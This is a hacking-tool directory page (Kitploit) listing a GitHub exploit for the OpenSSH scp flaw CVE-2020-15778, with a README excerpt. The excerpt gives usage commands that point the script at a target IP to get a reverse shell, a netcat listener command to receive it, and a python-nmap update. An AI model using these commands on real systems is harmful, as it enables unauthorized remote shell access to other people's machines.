Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-15778-Exploit — Exploit for CVE-2020-15778(OpenSSH vul) | Kitploit
Tools/GitHubGitHub/neko-chanqwq/cve-2020-15778-exploit
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubneko-chanqwq/cve-2020-15778-exploit

CVE-2020-15778-Exploit

Exploit for CVE-2020-15778(OpenSSH vul)

View Repository
38174 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-15778-Exploit

Exploit for CVE-2020-15778(OpenSSH vul)

Example: python CVE-2020-15778.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234
You need to use netcat to listen port before use python script
Example: nc -lvp 1234
1.Screenshot of using script
Alt text
2.Screenshot of get shell
Alt text

2021-7-21 Update Log:
Use python-nmap to check host status
Usage:python3 CVE-2020-15778-Update.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234
"pip3 install python-nmap" before you use Update version script
XD

Download Tool